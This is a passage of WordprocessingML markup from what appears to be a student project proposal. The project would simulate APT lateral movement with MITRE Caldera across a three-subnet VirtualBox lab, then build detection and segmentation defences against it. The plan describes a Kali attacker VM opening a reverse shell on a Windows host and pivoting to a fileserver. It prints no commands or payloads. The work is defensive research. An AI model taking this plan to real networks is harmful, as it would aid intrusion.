        </w:rPr>
        <w:t>ection</w:t>
      </w:r>
      <w:r w:rsidR="00F565AD" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00510B9B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we’ll explore </w:t>
      </w:r>
      <w:r w:rsidR="008700E5" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="002239EE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">proposed </w:t>
      </w:r>
      <w:r w:rsidR="008700E5" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>simulated APT attack by performing lateral movement using the Caldera Framework by MITRE</w:t>
      </w:r>
      <w:r w:rsidR="00443A28" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A501CF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r w:rsidR="009B4DED" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>erforming this attack on poorly configured Virtual Machines, it simulates a complacent</w:t>
      </w:r>
      <w:r w:rsidR="00C14209" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B447E4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="006D5DD0" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007905C4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">poorly configured network </w:t>
      </w:r>
      <w:r w:rsidR="000E3D36" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and how </w:t>
      </w:r>
      <w:r w:rsidR="00316B2E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the lateral movement attack occurs following an already established </w:t>
      </w:r>
      <w:r w:rsidR="00513F0D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>breach within the network.</w:t>
      </w:r>
      <w:r w:rsidR="00A501CF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE2B4B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">It is important to note that </w:t>
      </w:r>
      <w:r w:rsidR="00CE2B4B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C33" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> proposal was developed during milestone 2 when the limitations of time and resources for completing the full procedure were not fully taken into account.</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C33" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The following explains the goals and methodology that we originally </w:t>
      </w:r>
      <w:r w:rsidR="006C7343" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intended</w:t>
      </w:r>
      <w:r w:rsidR="00BE5C33" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to achieve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202D8D7" w14:textId="77777777" w:rsidR="00AB0891" w:rsidRPr="00FF6966" w:rsidRDefault="00AB0891" w:rsidP="00106968">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="008BBE50" w14:textId="1165551D" w:rsidR="00106968" w:rsidRPr="00FF6966" w:rsidRDefault="00106968" w:rsidP="00106968">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Goals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2CD2E" w14:textId="0E12EDBA" w:rsidR="00AB41BD" w:rsidRPr="00FF6966" w:rsidRDefault="00AB41BD" w:rsidP="00AB41BD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Our goal for this project is to not only understand the threat of advanced persistent threats (APTs)</w:t>
      </w:r>
      <w:r w:rsidR="00EF3793" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">but to also find a practical solution to it. I must preface though that the scope of combatting APTs is massive. </w:t>
      </w:r>
      <w:r w:rsidR="00DD638D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Many</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pieces to the puzzle can be categorized into preventative, detective, deterring, and responsive. It would require defense in depth at all stages with numerous strategies where it’s not only reactive but proactive against the attack. Since APTs involve a wide set of possible strategies, they must be met with the same and more (also the challenge of still keeping things functional). Strategies would be applied to the network, end-points, and specified zones or choke points</w:t>
      </w:r>
      <w:r w:rsidR="00EF3793" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7C654B" w14:textId="67769C33" w:rsidR="00106968" w:rsidRDefault="00AB41BD" w:rsidP="00AB41BD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">So we will pick a few but major puzzle pieces that are networking-related. The practical project’s goal is to find a way to prevent and detect lateral movement and contain it within </w:t>
      </w:r>
      <w:r w:rsidR="00EF3793" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a simulated network.</w:t>
      </w:r>
      <w:r w:rsidR="00106968" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E0F2F" w14:textId="77777777" w:rsidR="00AB0891" w:rsidRPr="00FF6966" w:rsidRDefault="00AB0891" w:rsidP="00AB41BD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B56B7B" w14:textId="31414572" w:rsidR="00106968" w:rsidRPr="00FF6966" w:rsidRDefault="00114FAB" w:rsidP="00106968">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4154B6A3" w14:textId="5CA537B9" w:rsidR="00236BD5" w:rsidRPr="00FF6966" w:rsidRDefault="00236BD5" w:rsidP="00236BD5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When pondering everything that was explained above about APTs, there’s a glaring problem for many organizations and states. </w:t>
      </w:r>
      <w:r w:rsidR="00B62D53" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Originally, we were exploring the possibility of employing Cyber-Physical System infrastructure (CPS)</w:t>
      </w:r>
      <w:r w:rsidR="00B12C91" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="004B6FB7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>detect and mitigate APTs as they occur</w:t>
      </w:r>
      <w:r w:rsidR="00D40DFA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A9465A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D40DFA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00B12C91" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">owever, due to </w:t>
      </w:r>
      <w:r w:rsidR="00D40DFA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00B12C91" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lack of funding, this proposal was ultimately </w:t>
      </w:r>
      <w:r w:rsidR="00AD259E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shut down.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00583691" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The following will explore our original intention of utilizing CPS t</w:t>
      </w:r>
      <w:r w:rsidR="00440CAF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">o counter the many avenues that </w:t>
      </w:r>
      <w:r w:rsidR="00B313EC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">APTs could </w:t>
      </w:r>
      <w:r w:rsidR="00D2234E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">attack from, </w:t>
      </w:r>
      <w:r w:rsidR="00E67D26" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">thus covering blind spots that manual human reviewers could not </w:t>
      </w:r>
      <w:r w:rsidR="00E67D26" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">have spotted. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00820206" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> proposed</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration provides more entry points and potential vulnerabilities for APT actors to exploit. Not only that, but critical infrastructure are frequent targets such as power grids, pipelines, water systems, manufacturing, and industrial processes. APTs targeting these systems can have severe real-world consequences potentially leading to physical damage or disrupting essential services (especially in the grand scheme of things). The “persistent” nature of APTs is very problematic for CPS also since attackers can remain undetected for longer times manipulating system operations subtly over time. And going back to computing systems, much of those are legacy systems meaning patching and managing hardware and software on them lack modern security features. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EF5B29" w14:textId="15CD0CA1" w:rsidR="00236BD5" w:rsidRPr="00FF6966" w:rsidRDefault="00236BD5" w:rsidP="00236BD5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now zooming in more on the networking perspective, several common problems allow APTs to succeed. Many organizations that operate CPS still use a flat network design without proper segmentation or micro-segmentation allowing easier lateral movement once they’ve gained access. Then there’s insufficient monitoring</w:t>
      </w:r>
      <w:r w:rsidR="002239EE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> especially in OT networks, also just the complexity makes it harder to detect unusual traffic patterns or </w:t>
      </w:r>
      <w:r w:rsidR="00C43FD4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exfiltration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE13104" w14:textId="65DE2739" w:rsidR="00114FAB" w:rsidRDefault="00236BD5" w:rsidP="00236BD5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure remote access is another one since many </w:t>
      </w:r>
      <w:r w:rsidR="00C43FD4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CPSs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> need it for maintenance. Then </w:t>
      </w:r>
      <w:r w:rsidR="00C43FD4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>there are</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> weak network boundaries, unencrypted communications…the list goes on depending on risk assessment reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9DE1D" w14:textId="77777777" w:rsidR="00AB0891" w:rsidRPr="00FF6966" w:rsidRDefault="00AB0891" w:rsidP="00236BD5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22217789" w14:textId="033EFC01" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="006379B9" w:rsidP="00ED0149">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338D3993" w14:textId="22362793" w:rsidR="001B21CA" w:rsidRPr="00FF6966" w:rsidRDefault="001B21CA" w:rsidP="001B21CA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Our methodology for this project involves systematically designing, testing, and refining a practical solution to mitigate advanced persistent threat (APT) lateral movement. To tackle this, we organized it into five stages. First, we deploy a base network (1) designed to reflect common configurations and vulnerabilities. Since we are addressing the problem of lateral movement, we assume that the “adversary” has already accomplished external reconnaissance and its first compromise. This means our first stage also entails setting up an initial compromise on Subnet A on a single victim machine. Once everything is configured, the stage is set for the next which is conducting lateral movement (2). Here the “adversary” does internal reconnaissance and exploits to move from Subnet A through the network towards Subnet C where the target data is </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contained. So, we simulate what lateral movement does to our base network observing and collecting data to inform the next stage (3) for analysis. Reflecting on what the attack paths were and how and why they were carried out. With that information, we enhance the base network with security measures including advanced detection and prevention strategies. Following those improvements, we test solution (4) to see if it works against the same lateral movement, we did at stage 2. See if it’s contained within Subnet A collecting more data. In case it doesn’t, we iterate stage 3, beefing up the solution and retesting before finalizing our analysis and drawing conclusions (5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE67C51" w14:textId="77777777" w:rsidR="001B21CA" w:rsidRPr="00AB0891" w:rsidRDefault="001B21CA" w:rsidP="001B21CA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0891">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0891">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Deploy Base Network with Initial Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C06F1" w14:textId="77777777" w:rsidR="001B21CA" w:rsidRPr="00AB0891" w:rsidRDefault="001B21CA" w:rsidP="001B21CA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0891">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0891">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Do Lateral Movement (Observe/Collect Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE32B62" w14:textId="77777777" w:rsidR="001B21CA" w:rsidRPr="00AB0891" w:rsidRDefault="001B21CA" w:rsidP="001B21CA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0891">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0891">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Data Analysis -&gt; Enhance Network with Prevention &amp; Detection Strategies (Implement Solution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0434A7" w14:textId="77777777" w:rsidR="001B21CA" w:rsidRPr="00AB0891" w:rsidRDefault="001B21CA" w:rsidP="001B21CA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0891">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0891">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Test Solution (Observe/Collect Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F3884D" w14:textId="1F64D3CB" w:rsidR="009303D9" w:rsidRPr="00AB0891" w:rsidRDefault="001B21CA" w:rsidP="001B21CA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0891">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0891">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Analysis &amp; Drawing Conclusions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DBE89C" w14:textId="77777777" w:rsidR="00AB0891" w:rsidRPr="00FF6966" w:rsidRDefault="00AB0891" w:rsidP="001B21CA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF9FE0F" w14:textId="463FCB04" w:rsidR="003B4E04" w:rsidRPr="00FF6966" w:rsidRDefault="00C3361C" w:rsidP="00044E4E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Base Network Setup and Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF52604" w14:textId="7706ACAA" w:rsidR="0069788A" w:rsidRPr="00FF6966" w:rsidRDefault="0069788A" w:rsidP="00585FFF">
      <w:pPr>
        <w:ind w:firstLine="288"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To address the challenges of Lateral Movement in a controlled environment, we will design a step approach that begins with setting up a baseline network infrastructure. Using VirtualBox, the environment can simulate a simplified network consisting of three subnets: Subnet A (192.168.6.0/24) for a Windows 10 pro end user, Subnet B (192.168.7.0/24) housing a Windows Server 2022 Domain Controller, and Subnet C (192.168.8.0/24) containing a Windows Server 2022 acting as a fileserver. In our case, the sensitive asset will be the fileserver, which will be housing a sensitive PNG file. In addition, there will be an External Kali Linux ‘Attacker’ VM that will be connected to Subnet A, in which the VM will use the Windows 10 Pro machine on that same subnet to open a reverse shell and use that machine as a pivot to connect to the network. A PfSense (v2.7.</w:t>
      </w:r>
      <w:r w:rsidR="009541E7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) firewall</w:t>
      </w:r>
      <w:r w:rsidR="00E30A7A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can serve as both an edge router and an internal firewall to manage network segmentation, providing a platform for testing vulnerabilities and defense strategies. That firewall will intentionally have a Lax ruleset and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>there will be some configurations within said firewall that will intentionally be left default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244FD56E" w14:textId="010AC51F" w:rsidR="00044E4E" w:rsidRDefault="0069788A" w:rsidP="00585FFF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
